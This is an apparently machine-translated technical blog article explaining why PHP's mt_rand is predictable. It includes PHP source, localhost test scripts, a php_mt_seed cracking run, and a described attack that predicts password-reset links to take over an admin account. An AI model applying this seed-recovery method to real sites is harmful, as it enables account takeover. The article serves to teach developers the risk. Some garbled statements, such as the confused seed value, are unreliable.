Deep understanding of the security of mt_rand of random numbers in PHP

  • 2021-08-10 07:00:25
  • OfStack

Preface

Some time ago, many security loopholes related to mt_rand () were dug, which were basically caused by misunderstanding the usage of random numbers. Here, I want to mention a pit in php official website manual, and take a look at the introduction of mt_rand (): Chinese version cn English version en, you can see that there is a yellow Caution warning in English version


This function does not generate cryptographically secure values, and should not be used for cryptographic purposes. If you need a cryptographically secure value, consider using random_int(), random_bytes(), or openssl_random_pseudo_bytes() instead.

Many domestic developers estimate that they are looking at the introduction of the Chinese version and use mt_rand () to generate security tokens, core encryption and decryption key and so on, which lead to serious security problems.

Pseudorandom number

mt_rand () is not a true random number generating function. In fact, most random number functions in programming languages generate pseudo-random numbers. There is no explanation about the difference between true random number and pseudo random number, only one point needs to be simply understood

Pseudorandom is a pseudorandom number generated by a determinable function (commonly used linear congruence) through a seed (commonly used clock). This means that if you know the seed or the random number that has been generated, you can get the information of the next random number sequence (predictability).

The function that generates random numbers inside mt_rand () under simple assumption 1 is: rand = seed+(i*10) Where seed is the random number seed, and i is the number of times this random number function is called. When we know the values of i and rand at the same time, we can easily calculate the value of seed. For example, rand=21 and i=2 are substituted into the function 21=seed+( 2*10) to obtain seed=1. Is it very simple, when we get seed, we can calculate the value of rand when i is any value.

Automatic seeding of PHP

From the previous section, we know that every time mt_rand () is called, a pseudo-random number is calculated based on seed and the number of calls currently called i. And seed is self-seeding:

Note: Since PHP 4.2. 0, it is no longer necessary to sow the random number generator with srand () or mt_srand (), because it is now done automatically by the system.

Then the question comes, when is the system automatically sowing? If every time mt_rand () is called, it will automatically sow, so it is meaningless to crack seed. manual does not give detailed information on this point. After looking for a circle on the Internet, there is no reliable answer. I can only turn over the source code ^ mtrand:


PHPAPI void php_mt_srand(uint32_t seed)
{
 /* Seed the generator with a simple uint32 */
 php_mt_initialize(seed, BG(state));
 php_mt_reload();

 /* Seed only once */
 BG(mt_rand_is_seeded) = 1; 
}
/* }}} */

/* {{{ php_mt_rand
 */
PHPAPI uint32_t php_mt_rand(void)
{
 /* Pull a 32-bit integer from the generator state
 Every other access function simply transforms the numbers extracted here */

 register uint32_t s1;

 if (UNEXPECTED(!BG(mt_rand_is_seeded))) {
 php_mt_srand(GENERATE_SEED());
 }

 if (BG(left) == 0) {
 php_mt_reload();
 }
 --BG(left);

 s1 = *BG(next)++;
 s1 ^= (s1 >> 11);
 s1 ^= (s1 << 7) & 0x9d2c5680U;
 s1 ^= (s1 << 15) & 0xefc60000U;
 return ( s1 ^ (s1 >> 18) );
}

You can see that each call to mt_rand () first checks to see if it has been seeded. If you have seeded, you generate a random number directly; Otherwise, you call php_mt_srand to sow. That is, during each php cgi process, only the first call to mt_rand () will automatically sow. Next, random numbers will be generated according to the seeds sown for the first time. In addition to CGI, one cgi process is started for each request and closed after the request. Every time to re-read php. ini environment variables, etc. lead to inefficiency, which should not be used much now. Basically, standby waits for the next one after one process finishes processing the request, and it will be recycled after processing multiple requests (timeout will also be recycled).

Write a script to test 1


<?php
//pid.php
echo getmypid();

<?php
//test.php
$old_pid = file_get_contents('http://localhost/pid.php');
$i=1;
while(true){
 $i++;
 $pid = file_get_contents('http://localhost/pid.php');
 if($pid!=$old_pid){
 echo $i;
 break;
 }
}

Test results: (windows+phpstudy)

apache 1000 Request

nginx 500 Request

Of course, this test only confirms the number of requests that apache and nginx1 processes can handle, and then verifies the conclusion about automatic seeding just now:


<?php
//pid1.php
if(isset($_GET['rand'])){
 echo mt_rand();
}else{
 echo getmypid();
}

<?php
//pid2.php
echo mt_rand();

<?php
//test.php
$old_pid = file_get_contents('http://localhost/pid1.php');
echo "old_pid:{$old_pid}\r\n";
while(true){
 $pid = file_get_contents('http://localhost/pid1.php');
 if($pid!=$old_pid){
 echo "new_pid:{$pid}\r\n";
 for($i=0;$i<20;$i++){
  $random = mt_rand(1,2);
  echo file_get_contents("http://localhost/pid".$random.".php?rand=1")." ";
 }

 break;
 }
}

Judging by pid, when the new process starts, the output of mt_rand () for one of the two pages is randomly obtained:


old_pid:972 new_pid:7752 1513334371 2014450250 1319669412 499559587 117728762 1465174656 1671827592 1703046841 464496438 1974338231 46646067 981271768 1070717272 571887250 922467166 606646473 134605134 857256637 1971727275 2104203195

Take the first random number 1513334371 to explode seeds:


smldhz@vm:~/php_mt_seed-3.2$ ./php_mt_seed 1513334371 Found 0, trying 704643072 - 738197503, speed 28562751 seeds per second seed = 735487048 Found 1, trying 1308622848 - 1342177279, speed 28824291 seeds per second seed = 1337331453 Found 2, trying 3254779904 - 3288334335, speed 28811010 seeds per second seed = 3283082581 Found 3, trying 4261412864 - 4294967295, speed 28677071 seeds per second Found 3

Three possible seeds were blasted out, and the number was very small. Manually, one by one was tested:


<?php
mt_srand(735487048);// Hand seeding 
for($i=0;$i<21;$i++){
 echo mt_rand()." ";
}

Output:

The first 20 bits follow the 1-mode 1 sample obtained by the above script, and the confirmation seed is 1513334371. With the seed, we can calculate the random number generated by calling mt_rand () any number of times. For example, I generated 21 bits in this script, and the last bit is 1515656265. If I haven't visited the site after running the script just now, I can see the same 1515656265 by opening http://localhost/pid2.php.

So we come to the conclusion:

The autoseeding of php occurs the first time mt_rand () is called in the php cgi process. Regardless of the page visited, as long as it is a request handled by the same process, it will share the same seed that was originally automatically planted.

php_mt_seed

We already know that the generation of random numbers depends on specific functions, which once assumed that rand = seed+(i*10)  . For such a simple function, of course, we can directly calculate (verbally) a (group) solution, but the actual function used by mt_rand () is quite complex and cannot be inverted. In fact, the effective method of cracking is to enumerate all the seeds and generate random number sequences according to the seeds, and then compare them with the known random number sequences to verify whether the seeds are correct or not. php_mt_seed ^ phpmtseed is such a tool. It is very fast, and it takes only a few minutes to run 2 ^ 32-bit seed. It can directly explode possible seeds based on the output of a single mt_rand () (the example above), and of course it can explode similar things mt_rand(1,100) This defines the seed of the MIN MAX output (useful in the following example).

Security issues

Having said that, why are random numbers unsafe? In fact, there is nothing wrong with the function itself, and the official also clearly indicated that the generated random numbers should not be used for secure encryption (although the Chinese version manual is not written). The problem is that developers don't realize that this is not a true random number. We already know that seeds can be exploded by a known sequence of random numbers. That is, as long as there is an output random number or its derivative value (reversible push random value) in any page, the random number of any other page will no longer be a "random number". Common examples of output random numbers are verification codes, random file names and so on. Common random numbers are used for security verification, such as retrieving password check values, such as encrypting key and so on. An ideal attack scenario:

In the dead of night, wait for apache (nginx) to take back all php processes (ensure that the next visit will reseed), visit the verification code page once, deduce random numbers according to the characters of verification code, and then explode random number seeds according to the random numbers. Then visit the password retrieval page, and the generated password retrieval link is based on random numbers. We can easily calculate this link and retrieve the administrator's password … … … XXOO

Instances

PHPCMS MT_RAND SEED CRACK to authkey leak Rain cow writes better than me, just look at his

Discuz x 3.2 authkey leak this is actually similar. The official has issued a patch, and those who are interested can analyze it by themselves.

Summarize


Related articles: